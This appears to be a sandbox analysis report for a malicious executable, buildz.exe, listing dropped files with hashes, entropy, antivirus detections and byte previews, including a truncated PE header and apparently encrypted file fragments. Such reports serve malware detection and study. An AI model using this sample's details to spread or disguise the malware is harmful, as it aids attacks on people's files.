                        Preview:{"pub...A......7.?.:...a.$5.[.=8h.H..z.:h..u...".2...{....Z.\.?...o......G7.....UU9Clw|......M.h@iv=J..)..Z.r..........-;.._.a....Rh._V...[.W...vWH*#.U...Z..1...v...M.:..!z..&=.a.;..g'..a.H.mH.=. .{j.}^....QK.v[.%..|....&....k.......0p.&../.....k%.k=.(........8.x....U..).`{..;.yq..c.M.........1..,...VAve.y^./.q....J2A.....h..y.....c..&...4OV..;{..u.@.....g?J&...^.......#u......2 .jIK ..i... kdy(c.S..IX..PZ%!t..d..z....#.... .c..Qs?E.O...U<.Q.i.6........R.".B...C..W...C..q..V[..n.SH>Po.....ue.i.,......&(...9.QGFP..h.......*.c&.....i.....GV.).8$.GK.]S..~.k.4`....`(.........^'....._=.;9...`....!0.(....&.{.|G\..A.."...!Qi.*..w,...1K.........g.Z4\.-....'a.}i....HE.W.B..pe...A...n..c.....%d.{.g..t..y..B.3.-...S....;....7,.*..l..../T....O.~$.:....!w.]......-...4b.7......Ml/..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):726528
                        Entropy (8bit):7.782011001754235
                        Encrypted:false
                        SSDEEP:12288:9CwgCcyMy1Nncixi2NWXCAcrIQBjljKsFKfFDKZNF:9cCp9KGiAAcUwjljKAK8ZNF
                        MD5:B7CB7F2B5CD9BD047710650295DC88F7
                        SHA1:3740BA8E89055CB0F5068EC9176B05C77432E799
                        SHA-256:E01C0429A58B33013305AAB35EF863CD2B88962E479E39566A687CA37C68510F
                        SHA-512:E6BD45366D067DCC6CDCDC4D917C4E819942CACCF22B64A1B1CF45199CDBF58DEFA0773A8D6A76C0672DB2824A724018253EFB0DB1A0BAF0C2F105D07758B471
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 91%
                        • Antivirus: Virustotal, Detection: 82%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......^...^...^..Y^(..^..H^...^..^^o..^/P.^...^...^`..^..W^...^..I^...^..L^...^Rich...^........PE..L...e8td..........................................@.................................h$..........................................<.......0...............................................................@...............\............................text............................... ..`.rdata..N ......."..................@..@.data...............................@....yar................................@..@.befajam............................@....rsrc...0...........................@..@................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):370
                        Entropy (8bit):7.339353749546556
                        Encrypted:false
                        SSDEEP:6:0+BHD5eOJgxEFcKgDrRybliZSI49lLJdMaZEPHLFiHBqheA/Mr8FGcii96Z:N5e+gxgV4VZHIJdrhH8h3/26Gcii9a
                        MD5:B5B4D430B6984E06DA274EF56F19DC80
                        SHA1:6CBC1249AEE358A6C6DE927EECA9ABBA006DC773
                        SHA-256:2F356576E1B2C1B955CA550D47A6451CE6149BB8F1D445C7EA1D2C56B07166A1
                        SHA-512:3F7225FE864C3442B8103E12CF3C6A425E3AAA6FA295EB7B12FC026D595945433A0511FE49896388494CD0D64BE4215FB1B20C0A0F17005EAC6344A0D780137E
                        Malicious:false
                        Preview:%PDFT:..\....D9..?.O.n....,..B.u.1.{...7R....T^.8l.3n...Q...EPw..J."...w....7..?.....DK'Z.<\Y....&.=.......1|&s.t.q....].<.....\<a...xO&l..][..&.A...Q...]..&...8..H....S....)&.B.K..uYEkO.L.gv....~i.....i.+w#~;|..Y..b...8.D......!wn...U...s..@..!.@......"*.V..z...v...9.jW..>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):388
                        Entropy (8bit):7.297117780939892
                        Encrypted:false
                        SSDEEP:6:71xmBXWTSI/SN73EXTwccVo13aa+4ItMXVPsBiRiKL8wVKoFzqlprV1/Mr8FGciD:n2XNI63xVMFkrWPapf26Gcii9a
                        MD5:D96F4964FCEA6940CD2F690C5982D607
                        SHA1:171043B822F8C62BB9B9CD88A781383A68971269
                        SHA-256:795C256F9FBE1726B5127A6448A8D9A48F2F18F1BCD47E41BA65075DFF73F604
                        SHA-512:D4BBF2E666075AC0CCAD90C9623B23BA13C3EAA8FD625F17A55E333EA34751EC00096C1A67B82B97189D13D4ED48C3BD7CDC6CECF3B8F38D06A61340CEF6831E
                        Malicious:false
                        Preview:%PDFT..Cg....0...R....vF..6...g.[.....f.!x.B.#6.x.......)...Iu7c.%U....+v.h.../.0...._kt....%.+.p..4.K...8n.P.B.fU.......d.,.A.({..6`_.C8.v..+ez..k..x!......#....:...m".....KC.d........-yp....F...d2..W...K..l.mml....eD>.9.Z.s..a....Y.B..IYbC.;.....6.-.<UT. ..qqG..9..G./..$F".aD...#[.v.R.\...)...KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1352
                        Entropy (8bit):7.8275431091947905
                        Encrypted:false
                        SSDEEP:24:d6QALabZfF6cZiS8ZuakyotiF4aErjaut37Z++afY12FeGbD:d6Q6oZ7N8PfotiF4drR37ZxafY124UD
                        MD5:86D1F2B6BD7FE9B754DB31D473E52C2E
                        SHA1:2F4138E475C29C1B86A596EBD1DDE134F14A4B35
                        SHA-256:8902C4B7AFD00E319A2B4695398D51477E55BD8C6DF23E32008EE69FE5841F2F
                        SHA-512:6A980132DAD1595B2E8C156CC879ECD098D50A3F7A2FECE29E748D92A0674546A3FD3CC71E9C5AE434487A6B25E63FAFCC3A46D7762910FD5B08D9B77F7403A4
                        Malicious:false
                        Preview:<?xmlj.........#..C........pp.vSf.n..g.^.,........x9.S.Y...G...`.{9.N..e."g].a.D.f..k.x....C...=.a.Z..i.....L)..<.(l...(s@...@ENT...@.H..............X3ab...De......r!x.1.e.S...y...x/..a...q;./.Us.y.o..r^...F..p.%.(.......n..i....G...."/}..n..mf..>T....^....BD....@.ap9......)&.r..j.....h...k.%.^~.<ug......S!.....ko.Z..>S....S..HTt.....;+\..8...7..S..bg.L....d..A...`K.f...CS..^..eK.a~3...}...T..6.5...;..G*...o.....&.r. .gyb._.......D.Tb&../.f/.vF&.|..PW.:;...A?n......m..O...T.(..z.;.....W/.fi.I...........:.AI.P..%..*...d...[@l.$....&f.It....:[\.\I.of$h.!t7..r..0.WF+R..Xw..r.......r.J.6.n.."h....~.Q...S.......-.El....n)f0K.......h.....o.......x.....(..5<........W.1.$.%.2...........hU.....yz..n5....OT..s..E;k..53......-...LI6...f...i.[...L.G.~.)...c...9....#Kb.e."..C.r...tMZh %...u...<..po/.Ji.+.....,.[...ZS.w.Zz.}....^.!.P.......Z&..?./'...o.R....-.M.$o.w._.;...N...V..S......7Zal$....h.B....J.....T....?.%i..s..>.........C.w.Z.u..t6.f.$6Pe....^N.{.l
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2430
                        Entropy (8bit):7.922632517606201
                        Encrypted:false
                        SSDEEP:48:pjykEthFR1oJtftTyPCWfnV5b0TNUGNlyUYQ+dmiOpkFYlOPFhjmfh0qUD:pwjR+PAVZiNeQ+dIpqjWhA
                        MD5:72A9263BC637CB5042B86A2459520496
                        SHA1:CEADEACC9ABEBD96175FF8AA62B9758904F1E2EF
                        SHA-256:B149A14A7102B671C4CD6DAE990DD13512C7072707BF1E737DBEB68308F0835F
                        SHA-512:883291197AB357694BDC19D2D2654478F9FC55B6CBFE2A299D1537C9339DF39FA59606765BFACDB0F496DC61A75831DCAECF9579D2C6EEEEC8368C7988BB7F6C
                        Malicious:false
                        Preview:<?xmlU.'R..........B....2*~....H..S.X.....5n...~...x.-.N...[I..I.4.3.2.\.n..'..s3..ld......2.h.@..f.]E|..m...eE....3p...K.{I,]..c..i.l.F.......:.x..x....^.d=.4x~...A..rU.2x..[...W.......c8"q...UT.......NI.9/.?.....S>N...@...dq.4c.0......hM.3NPF,.......ur....G,...>....$.MF.kR.t..#..[7[....W7..F.ev.GV..f..Y..h..p.>....@.|....b....K...h..we..{.%.W...W.-*.3gD..<...S.=[.;.&.C..cf..L`...}.ZT0MAb.b...B..g...>....*.C;.gu....%..X..p.(..I.w(F).....t.b.''.>....C>...x../..$..<[.nj$l]aS`...zOb...$...tixo.....S..}&7?........qX....t.a.%.d..{nm.s..a.4.i..=..8Xk....d.D.M.+.....~.: ..pS3..>b\...Ih..3.6...DlL.1'.1.h.'7.c.Z`..T...S..SL...\.S.2..EJU.jb| .N.4.:|..kQ.Z!......c..7..{...T.V...)0....A.......TD..y..$..pY...........SQ8.A..o.!......!..UM.S.w..7.;..%_WYQ.:.@.O.\.<o..].. z&%....56..B%>.'.......a.~..=....*.6.d.O..[...N]d1d>.X..H..F....8..J/.<........$oL.p..?.].H~.....v.b..+Dl.$.m.<..i..U......(D..$..5.sN.Fzu.:..>........,.n.{...j..d.4...>........S..3...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2388
                        Entropy (8bit):7.912953596689455
                        Encrypted:false
                        SSDEEP:48:CaMsnCqDrOZ8iW1TJmdRLLHqqz3IJjFVOHybHMpyUD:C/QOZlYkSqYOHybayA
                        MD5:34C05C29FFEBCF309F00AEE7EEFE9D1B
                        SHA1:C8B4AAA2F1C242B8240E6865F29E23814867F488
                        SHA-256:44F2ACC73B76C37BA48E5C0F582D7E2C238E0E0E45347FAFBCAF819567A9EC88
                        SHA-512:E35EEA33C2259F58503CBEBE535205C60FB26261627AE0F0B93C973A73D3B8FBD7C9F583479A8F3EEA64463A46E2163D71294A0696AB40E8735765039D21676E
                        Malicious:false
                        Preview:<?xmlu.;....G....... .......>}.|....X..S......`.......s.u'...[....l.:...GP7$L^."..^..@..'.T.<...U.a........!..i.....:). .q.e.'.RPV..?.G2aJ.....}Y0-..z.....3`Tx..A...x...C....iz1.....1..u........V"E...{..xg..j..*..=.?....o.......stKJ.u..;:.....V?..@...;....F.<........e.....d...N.E....}.#.0^-?..2...`.$I.=....G.1K ..\..........l.^..o.H.......?.......{.U.s.E$...kT.4.h....7...%....HW....xX..o..<..?.........M..P. `~?..^)6=..P...$.n6...3.m..jo.....d.....)Y.A\V..Y..&`:.%.bK_z5zb(....W.{......fq&.......HWz,._.i..!{E....D..6t.c....ag.&..j*aG..)?..E...d...+.......A..Yw.....!f.. .0...(.#B.v.Ad-...(E9..../.0..dH..L.....T....p...q. B....'....w~.../5..W{f..o......Ik....JA\.6...b....j.I.u....3j....6l.z~..#:p.......RV.r..m.t..%.....t.J.;#t..P7d...q....h~..B:..{.........6b..b.....$.BcM.23....E...|.q...+|....`H..Z.$L..y...+!.....*=........3.c..P=...m...3..........Z..wWto..-.N.G.x....(.Y..8.X.Z......$...p..~...s....`..sr....(d...*..hP/:...F.g......9}.nH.7.H
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2405
                        Entropy (8bit):7.923477058899395
                        Encrypted:false
                        SSDEEP:48:rlDwB+R69Z+YTgo13a9JGw+gI9gx7qedaYu9I6e4aA39DNTBnUD:rNw1fxTJ1qj6iweda7y6eRgTTVA
                        MD5:2AB2F6F7BDE267EEB95326C78EF68C3B
                        SHA1:E8F07F85FBA9DC424E8052EB78FCA576BD93251F
                        SHA-256:472BAB4062D1D5C3BE1E04E66972643D2713B29505F4D74BB647C93ADD04333D
                        SHA-512:3758BB26460E044C9BAAD6FCDA0BAE051595AA5143A9A4E99AC199C677520590C1D110251DED9E2FC5E473183FFDC493B71F368C773F5546DDB39EBC43676ADF
                        Malicious:false
                        Preview:<?xmlE.~..~.B. q,..y.O..)...<.&(.}...'..\..GP.?j...udEG...Z)...... [8Q.v...~..},XV.!.............Z...wv.s.1....&j[..u.?.%.zf.?i.A.Y..&42.%.a..f..7j+.u.6...dc..E...1x_*.....O.`M.V..]..P....mt.]......'..3l....~I..SM....IH.o.j-.9j...N......[.....!.1.............d.1...D..F...].oZ...N7`64...1......8G.P....!..8Zq..h..J..rf....._......98zq}...).....y..k.-..E..5 .....a.....F4V..g.........N.h8.h#N.........E.'....u..G..CO........=.E`.......B.G..*eU+1...8w.....7.....6.:X6.Mu..ccG..a.........Z.w.........4....._3<C&:v.........u2N..W...ly.......Mb.................,..\...JVs...wj.YX.tP.{.m.3.."zt....nW2g...{...d...E..-0..WY.3...>..H..,.s.....A$4.[..M>-.w..W|....X.......F.....zg[..i..H...b.....UY..(q..|G5..0..OM...^h...3|.>...O.rP..j=..........L..J..a.... ....Z3.C.$l...\.4.w.R.w.7.F......S...c.i.X.F.vYa..o.d.....O...[k.z...']{R.>QM.qu.bj..O..d<..H....S.+Cxm6.......g..e%-..[.c.@=....u.`_.....gL....@....^3C...^l,..4>..^...D`U`..h...c/.(}/TO......F.9.O..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1358
                        Entropy (8bit):7.8471879208099
                        Encrypted:false
                        SSDEEP:24:gchKlcGWZoGqZepkI/TEcwc8Fri3BiOFhJzJtd508eGsPIGiYqgiG9VgIoMGbD:Z7oHAT/Ycwc8JqgQfRQjqnEHUD
                        MD5:E6A59151B99169F5CEB47E18861CBA8B
                        SHA1:C85E7A6A7FA2632E48557F58E3B4DECCB5B1A956
                        SHA-256:74CA85D8476D2081790005582B75390D91F22E63ACF0718C46EFA3649BD70D91
                        SHA-512:DF95535ADA5ABA3544D251244DCECCA4978FFB59B22E498FA2503E817C4BE998AF9E1164C31D14C115183D25896F2D48CA6D2364077A8D118E6C169C69C81C90
                        Malicious:false
                        Preview:<?xml?.E;...I..5...(..,1.TFiV..Kk`..V..bfP.,.A...!.....n.V.j:W......P..... [.....,..p]....._fu...+...YT".q.VrM.)ai.......dC8Q;R.R..b...6......^..hz.yz5+.<)%.H.(.Fu./.9X.>@i).......*N....[..%?........./5 ....|..9.C..b...T-;u8.N...g.....4m.l..O.$n.g.)0.}5...i1}..F..@...x.7j.k.....!.7|.Y...yn.N<F..|S'..k..K.!.}..d@..........>.X..A`{.Mj.P<0..........Mo&O..WX..d!...:...].{.b...*..8.6.p.=]%.`.O|f...-..9.}......H...u.3I...Bc..$C..k......A6...y.QY....]....9..N. Q..h.j..h.(.y.K..@....7.9L..(4.(.........:..`x...s.......M.el...o...n...Q.r....w...N.......F.a....)..tg.>.._..m.<>............R*..o...\...>S.....7;.,.e...{t. .B.V....tl.?....*.b.$..N....".A..L....JK..1?.5.#...,...g_,o&Z#....'.....8_../Em@*.+.U.......g@"?..C} ...&...r0..5V<.{.yPD.).a.M...P.[..<..y....b..B.|.....`......g..On7@.IHP45M...4.\\.."z......B.?...t.s...`...z"......K.|...+[.|"..L_.......9.3..P...'.Y....i....B.vX...h&...xz.>:.>...~.=...t.......N.w.0.g.....2.....i.|.Q.w.l.8..m...v....cJ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2416
                        Entropy (8bit):7.911342800493269
                        Encrypted:false
                        SSDEEP:48:wDbSbptWLrFffndXcQHBWJHhaov0qalI2xjRsJceq+su0PsTo98aWYP/VUD:wDagJcQHsHfcVK2vsJL1sNUTXaVVA
                        MD5:8B9865805CB2BF2D95CEDC187EB54061
                        SHA1:5AB3A9C0D776D94C3C085D32FD758B488FCFB2F7
                        SHA-256:65A01039AC34F8A04A11664C843369ED026D7B8CDE09514218FAF98CD297F5D5
                        SHA-512:730DF3011F1277E0262F7497B76221EC2CD87E3A95A805B2A591B9FD6C6EABC5B5C5381AA281EF086B272A04EE3F5B1DE223707C5E8662CD4650EBBDFCEDA143
                        Malicious:false
                        Preview:<?xml...c.............M..0e.9..e.....-).Jk..<o.N.S..../.(><..W.B..<M...[yD....[.:[8.:....@0.....4....."&x.x.d;.t<..0.{|#....o....Qc..0...~..i..@L.{X.z...1.C.9.Eo..o...dZG.-J-n#.M..2b..#.YT..>".....X.....;+/.7..T........(k.$C.S....h.3.!...t.K.....e!%.-.%.5.........T..rW..@.*..[C.i....-.A.W`.....Y...z.f....2.#z2....8...._.C.`[.j.rF5......./J=.A[+.o..M.p.}{.a..v..*5&. ...../...P.....1.P.C...V.....|..)..L..Y........<..Pn4..H..K...9.-...%E`.g.....CAU...(k..;q.}...:........Z...*...,J....j........0.G..i.a/\P..b.;.............w.......KZ...@.}4.f....=.x...#.....?.e.-.#~.QC$...*8..*......O0..I.._.3.4T.)./.0n^M..|..A.,.ebs-@R.F.)...w..y......V..^.4..ifX.}..9__P.m.J.&;1q..*...\f...V<.........fC.aELiv]C..o.+V{.#H."..B.ZR3.F@(C...T5..}.y.]..W..5...$.ih..D..kE....P.<.O..d&0..y8-oX...y..Js.....+A..rqS8.p...^[&..K..B@A.>bG.t6.-....k.E.K.n..~.HP....'nD!P3..ouf...a..~..~ea+...MaZ.D.)....`..i......)...4Y_..sO_.sF2.<p..g...$.k.....'E..`?7....dN...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.859246557402013
                        Encrypted:false
                        SSDEEP:24:EyQ273MWBGB/AVtGzTFr1APcijqApYHxXciWXxDE+tfcZV+GbD:Ev1WB6QGeXVe1cJ4+15UD
                        MD5:3A47B61C0AA1600B6CBA43DB0A1CBC61
                        SHA1:362B9DDCEFB8982621F89DC61F474461AE5C8253
                        SHA-256:F76063C0CDCA90B3950825B7CB38CC7E3AF2400C927F85EE473BC8DB351EAD10
                        SHA-512:7534CD57EC62E2E1D48CAEAB9D38775DCB251C56D82747A4F257E14AA8A831E7F952A9C44ECF8F17040198AD8DAE3BDC4D7C16C2C2BD77D9BCA7ED79FB943AD3
                        Malicious:false
                        Preview:BJZFP..5.r<..0.....0.$..}..m.,.qRH\.8.BvW....{B...T.8Z.G...\.y.........=d;..l.P.......b.3>p.aV......>.&... .Z7....6B..|....-.....E...}L..q.m.....0.i.88.8...._....!?..?..p.q/...M......R....S_...e.....~......Y..{..r.4<$$...r;2..N...!....W4..3.)..Awl7.I.........{.....N.&......8~1)...Gj.i...IH.7.]V....vV.. ..b=0).I.|F.]p............!.]-.....d......p..7.I..[...g....v!.mL.xuiI......2,.....W.3^..@...........5*gk.6Y..u.....(...t..4[.i.}..HT6.Tj9.T.0.....>.......(u.V...C..B....m.R.....*...a.qq...4..........Z....dm..Ak\.Bw...H..JP....d..*.~.(.......@..rYx&T.u..H..V. ....V.=.@H..i........c..sz........Y..F.ry.x.P)...'..Z.y...."f......y.....'0y?......D\.q...8...b.......G..P.......'.;.7T.I..,U..t&(.....a.........&.S..2eR...h.H@...v...)...=..<......C..m.@...t|..6......Y.w.$..63....3(...n..@....}.N1....o.!............\.7.M0..m{..A......?...x..HH..3%.....z..%D.clZ..%....q.Ei..z.x\.......o.....\.*.qpB*.O...5...-..D..........R..d....?!.3..=. .2..d....5
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844488245170731
                        Encrypted:false
                        SSDEEP:24:Q5NGRVMoGCZl2FKKjsOTEv6r8GOlMhDK32zvy1uST3zI2VZhtYGbD:QgO/zFpOehDK3Kvy1fTDCUD
                        MD5:07BD1F4F4BEF64A85126F4F7A008F6F5
                        SHA1:4BBFFE09CC3C006356A846295A5DC9F7C75F9D5C
                        SHA-256:A36BD78581A4AEC46EA746D1FA735E5DBE096DB9C6FC7539BA1AECE4ECEC2FD4
                        SHA-512:7764C455CA2721C69B00F184F1542DAE58DAFE2E712BE003DEF3B85324B473AD75D88DC667C935845E861E5277A1CE28069586DE783B31B8DE59B1633D7E8BC4
                        Malicious:false
                        Preview:BJZFP.u.......O...\.I..@C.g..:V....*"{tT...N....R..H..#...F.c..y.@;.z.wI1.}...h...Nj....)4.1. Z.....;^...v..F..}{..H.Q.n#$.}Jm...q..yQ.v.F.....!.)Fv..7<.....lYx....|P..T.....o.l.'.K:.....[D;.b.w.w10.....u.......^.n..._w...G..c..l.:..W..W.xJ...[...%T4.....V..N..]...#.2...k....".....U.9..}...sU...r~a. hZ.s.7C*3.F........6T..|j;.....(y..+.&R...0h..M.M.0....Q!`..2k.?..#......I.i.\...32v....|....Qpv.....jkr........1.J..... ...L.......IS...+.~.0).g.!....a.BZ(..8'.e.2..a.<.....WB^a.C...................).....p2\c/(..|..fI.e.........5.l.=..F...~..p....h`K. MpM...`...0...-..q.'..:.qr...yk.Z......q.>........%.P...I.....f4\n..~.<.......D.uF.3.`..W./..8..`(...G.caC.._`g.a.K]=#..>...}..K..x:8.e.a...Kf....[bh...............?].....k..!F...:.q..2....Mh.F..*.Mt...x..=...r...J.Q.Q..=.z.1'h....h.+AO-.. ..u.a.l....I...2a{.I..z.w-t*4M<3./.....C..r.'.......z.Ak..y/..,'6i...Z}......M..K.."E.....+\l-mw.MK.>.j7.H...u..f.6EMo..v....n..Cm..;_...D..-[c....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8460203161185875
                        Encrypted:false
                        SSDEEP:24:w3xcBdAwg5PpHGjcG6MgHJAmR0zh22tdsgz5KMwSqFyiJjAujkr3OmYJlw/Y9e1g:nBdAJwcG6n5whNtHzNcj2Om+l2Q0UD
                        MD5:9ADFDFAAB46B4D112E0C08D55E57A625
                        SHA1:F20479E284CF352150D85D22289DE3E7C66F7B8B
                        SHA-256:B27466E8A94FDB18211952359BE10EE93D59D0157D2D66EEBD7A523CF0F4B310
                        SHA-512:A9DC457924599F21B84BF6E35B4B1211A797F9FB82F6604C600C01AECBAAF80517CE0897DAA72DE3271CCB7DBC8A1DE7FE0341C3F50F823EC057930B1B21A61D
                        Malicious:false
                        Preview:BJZFP./..LX.).q0..n.Tf.6.o.......B..5..L.N.{_......:s]....F.TGI..M........Q.}...X9N>.v0%...x..i..}.SW....../l.8x......{..WC`....p&..d..>.."=...I]?....g.h..~..l.v.=...j:.A..=..&U..........t.'.T.!.........S..........qCS..........&...}..5="b.reR.y..l...&k.?...8...R.v..w.........>.....-..i5.......Tz.1...z.K0^d.~>.f.$..&..t...7.'.N9q8.c..2@.8.`..>.....b..o..7..}r+.ey{x..B.*g.8.*.iD....(.... g...~4=..._.6..L.f..2.).8g9.h..e.......J....)....d...@7.L.>%V.Y.....m..T.L.M...*..rx\.SuWS..o...L0...a.@.}..R.hi....ej...OY.q..gU.u..a.._.L...K...9.tz...W."qB...].-$71.....[...I.X.?...L..3...~$9....{.[.Jh...Pp...9.(.*-.OA...B...0]71...T..|.69[.l..q^&..3..J..:Y..s.......DK].R..z.T...s...V).........#.KV.E4.4z..>....^..M..wm.0i.....3.:#.x.T.wK7.83.Cy.R$....L.3..ej..#..._.&'7....L.k.....e.Y...b..c.<.|..*6..,%z...A..........U....4....w.fE. ...e..0.....0/.Q.>.#T..B'.*.-......V.w..C..e.%]c.V...Y.+.!:...?.tU..p.a..nE.VJm.0fA..Rr..Y..a...d...EY]....><.<.|...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848869969754525
                        Encrypted:false
                        SSDEEP:24:CxYqiFed8RLC0PrFOxE/QfYDiyYc8Jom/8FiXQX6WT+GbD:CxTORD5OxEQJyYc8W88YXQXqUD
                        MD5:B7CF6F9E275D2F8DFB055D9184ACB8BB
                        SHA1:E3B0562B891E1F306E752BD86D2F7D9B808D8C03
                        SHA-256:672B60E43570B1B796AB6873B93AC8A4ABDEFA17EE00D9883EE2BC19E40E51E2
                        SHA-512:619186C91A6EFC5E9F6CA8DDA49C9399E6A25A65EE859698680A1A8FE7521B15DF8DECD6EC530C2019F2A04F78F5D559A789D41439F61FC1A067431CB6C0BDD0
                        Malicious:false
                        Preview:BQJUWq.~....+[O..O...h..o.'...@5.p..R..tE.}q?6.*.#)....+.u......=....$.?..p4-9X.^.7..\..cN.Z...).....B... .,...g1..l.....)X.u9.?......a..._.{WI`...#...u!...N.....;..7........A..D.Q..Q"'~...$../...H.....OG.nP...p....J....Q...~..1B+.ie.\....I.7j...%...m....2....K.+...X.....'l+.MT.....F...m.vF|..o.......Z.w..t.c.iW...V..'9..G.7....1N....L...f...]7.Q..MF.g..v.MXFs..yV~..W..,+.OM4.0....Y.M....7..L...@.Lp..fU\4...qK.\......~..+...Z.>...p.......nJ~...+>....#..X...=.....;..^....}._)..t(u.&.lM,..2m....g.M...b.#..L(...1.]....\.=...<..)..q..O.[.T...M3.-V.@)(.#..`..s..#.b...eh.J.&.!US.>.}%.......r..,.UQ...1..UI.#5_[R..[...|.~..X...'T.......s...O|...U.X....P......D.....'(2=.}..\.[....;.....{I.qW....b.J.\............g......O+T.lkq..ti.K..*..4......^.\.s.vc.<......p..j?...b..%-...I.yK...)k.....:g1\...q.!.2b....t........5...y....C;.sK..-W....T.u..~..T5.....Z{..a.7.d.ZvsR...X......:......Gt....L.=iG..j.K....M..Gj..Z].%...k..,.."...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846575970833408
                        Encrypted:false
                        SSDEEP:24:3SsyKWiLgPiz/xisGgtiBCz7MBLYgzI+CJEXu0aCrDcu8X4j6C1KyKvCbGbD:CsySLgP8xsgak+kmX5rDFlTIyUCbUD
                        MD5:323B40B2A5C6B25E64A121E4B6FB02B4
                        SHA1:DF8DB7F55AE0B4575531DC66DC9D48E17ECF64D4
                        SHA-256:9A7043692B1AEF249D3C5AFBF5CF1A0B9B4DC57DF968670A882D541BD2C83DB9
                        SHA-512:99E6F1A6552B00B1FDCF9976074096F91C46FB3C22031E826C3AFD0139C3E68D21F2A6F687C448EC628CF8212BFB7F4C03083AF508C3DE027883E8EE0D94A56A
                        Malicious:false
                        Preview:BQJUW.,=..[.E.=b5H:P^J.......6=r4.5e.[.c....Pf.......`Q...0.fB L.#?.T.t..7tB........^.p.f....(.&.I..ep.'..>A....wX&..X...Kw..O..<.5....6...v.N.=X...r....>...t..wDy..)JS....{...[..:HxUI.7.,K1..gtD.el....Z..^3.G..~.t...~.J...G..2HE.>....,=...b..b#..qma.@..A3tU....(..|.I9.&?........W..Ph.5.X.~Wm...Y...h...q....a...[I..1..d.f.;.$.~%V...G.....]...d...{I.k..'..C.F.~o.=.pT..F......r...q`N..^l.....Yj..B..!..!..-...7zq........!... ..0.V....a.)?...X...G...D..G...w..4i-.]j.#...\..oL....>..^.."....7fXM....[.b|&..x... q.c.@G.|.K.ZH...C.....i2JK.....'..1.N..=c..3.U..`W.........nb.Y...V.zPP@"..J........uS.|A.:X?-...Y`..P>?SA......#Zb).;UU.U%....7<......*..:AN./J&.].k..`.....T;pg..rY6.'........MAt..\.z...r&...C.qw".....s&.....\0..W.]....AcU.....-...s.(9..rZx..a./.Lgb@.f.K..g.....M..r#Nc...}......8.....^L.\tkn....G.:..n,..]..p4.J.....d.....qy.......$..lK..K#?% }5|.'.P_w$.*..ki'...@....v.X6....7...M.J.a..O.!...d.....v..D.......P8....k.vH..;JB.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.842955193790449
                        Encrypted:false
                        SSDEEP:24:RZBjEWDRKhKCeoDglvvDYKbhku8eYtCS8NAHbwkJGbD:pEcOR/sNv/bqttCS8NA7wkJUD
                        MD5:606FB99EC82948B32E00D0353481D707
                        SHA1:BB15EE1C4830A5C322B366A6E93EF6F550467852
                        SHA-256:012849A581F125FC2D39C0AEBADD0065BEED5898A757512A8F0055739FDAC173
                        SHA-512:6AB60A0309F0954FE0C7F8ED333BE6F8AA268A908FA092FB4D2FB0312123DF95370C0385756ACF76F87BE54B19878798F5C6A22CD8A83E03CBCFFBACCBA3BAE0
                        Malicious:false
